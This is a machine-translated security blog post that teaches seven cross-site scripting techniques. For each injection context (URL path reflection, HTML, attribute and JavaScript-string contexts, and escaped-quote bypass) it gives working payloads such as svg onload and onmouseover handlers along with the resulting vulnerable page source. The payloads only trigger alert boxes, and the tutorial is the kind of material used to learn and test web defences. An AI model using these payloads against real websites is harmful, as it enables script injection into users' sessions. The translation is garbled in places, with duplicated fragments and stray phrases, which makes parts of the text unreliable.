Aquaboutic | Focus Security Research | Vulnerability Exploit | POC


3] 7 xss usage scenarios you should know

Posted by fleschner at 2020-03-21

The 7 main XSS cases everyone should know

Translator: LeBor

When reading XSS related articles, we usually see the classic pop-up window payload, < script > alert (1) < script >. Although it's right, it's a little limited, not enough for novices to deal with different real scenes.


Here are 7 cases that everyone should know about XSS utilization scenarios.  

Http:// this is the test environment.

At the beginning of the source code, there is an HTML comment that contains all the parameters that trigger each case. All of this applies to get and post requests.

You may notice that all cases can see the input payload in the source code of the HTTP response. Independent of reflection and storage, the most important thing here is to show the output when it is allowed. For convenience, use reflective as a case. DOM based XSS is not in the scope of this discussion.

Remember not to test its cases in browsers with XSS filtering mechanism, but in Firefox.

1. URL reflective

When the URL is reflected in the source code in some way, we can add our own XSS payload to it. For PHP pages, you can use the slash character (/) to add anything after the page name (without changing it).

XSS payload”><svg onload=alert(1)> "> payload <!-- URL Reflection -->   <form action="/xss.php/"><svg onload=alert(1)>" method="POST">   <br>

Different languages have different reasons (reflective XSS may appear in URL paths or parameters). For PHP, the main culprit is in the global variable $_server ["php_self"] of the submitted form field.


2. Simple HTML I (HTML injection)

The simplest and direct XSS, directly inside the tag, does not need to close or escape any characters before or after the tag. Any XSS payload can be used successfully. ( <taghandler=jsCode> )

<taghandler=jsCode> A=svload=alert<svg onload=alert(1)>


<! --Simple HTMLi --

<!-- Simple HTMLi -->   Hello, <svg onload=alert(1)>!   <br>

3. Inline htmli

It's as simple as the previous one, but to insert it in the tag, you need to "> to close the tag.

">"><svg onload=alert(1)>"><svg onload=alert(1)>

I. Introduction

! ---------------Inline htmli ("double assessment")

<!-- Inline HTMLi (Double Quotes) -->   <input type="text" name="b1" value=""><svg onload=alert(1)>">   <br>

4. Inline htmli: do not destroy the tag

When the input brace is escaped, we cannot close the current label as we did last time.

<!-- Inline HTMLi - No Tag Breaking (Double Quotes) -->  

<!-- Inline HTMLi - No Tag Breaking (Double Quotes) -->  

<input type="text" name="b3" value="&gt;<svg onload=alert(1)&gt;">

<input type="text" name="b3" value=""&gt;<svg onload=alert(1)&gt;">   <br>

At this time, you need to use the payload of an on event to take advantage of the XSS.

payload XSS" onmouseover=alert(1)//" onmouseover=alert(1)//

You can see from the page source code that the value is closed and provides space for the OnMouseOver event handler, pointing to alert (1), and the following / / comment out ">. JS pop ups are triggered when the victim clicks on the affected field.

onmouseover alert(1) // "> JS <!-- Inline HTMLi - No Tag Breaking (Double Quotes) -->  

<input type="text" name="b3" value="onmouseover=alert(1)/">

<input type="text" name="b3" value="" onmouseover=alert(1)//">   <br>

5. Htmli in JS

Input is sometimes in JavaScript (the script tag), usually in the value of a variable in the code.


But HTML tags take precedence in browser parsing, so we terminate tags before inserting new ones.</script><svg onload=alert(1)></script><svg onload=alert(1)>

I don't know.

<script>   // HTMLi in Js Block (Single Quotes)   var c1 = '</script><svg onload=alert(1)>';

6. Simple JS injection

If the script tag is filtered out, the previous utilization will fail.

script // Simple Js Injection  

var var3 ='><svg onload=alert(1)>';

var var3 = '><svg onload=alert(1)>';

So you need to inject JavaScript code and respect syntax.


Connect the value of the vulnerable variable to the payload we want to execute. Don't let quotes work, close them. Connect to our code (with a minus sign), then reverse (connect and insert quotes) to get a valid JavaScript syntax.

payload c3='-alert(1)-''-alert(1)-' // Simple Js Injection (Single Quotes)  

var c3 ='-alert(1)-'';

var c3 = ''-alert(1)-'';

7. Escape JS injection

In the previous case, if a single quote was escaped by a backslash, the injected payload would not work.

payload // Simple Js Injection (Single Quotes)  

var c3 ='\'-alert(1)-';

var c3 = '\'-alert(1)-\'';

For this problem, there is a little trick, escape escape character. Insert a backslash to escape the escape character of the program, and single quotes will close. After connecting to our JS code, annotate the rest with annotators.\'-alert(1)//\'-alert(1)// // Escaped Js Injection (Single Quotes)  

var c5 ='\\\'-alert(1)/';

var c5 = '\\'-alert(1)//';

PS: if there is any translation that is not in place, please give me more advice.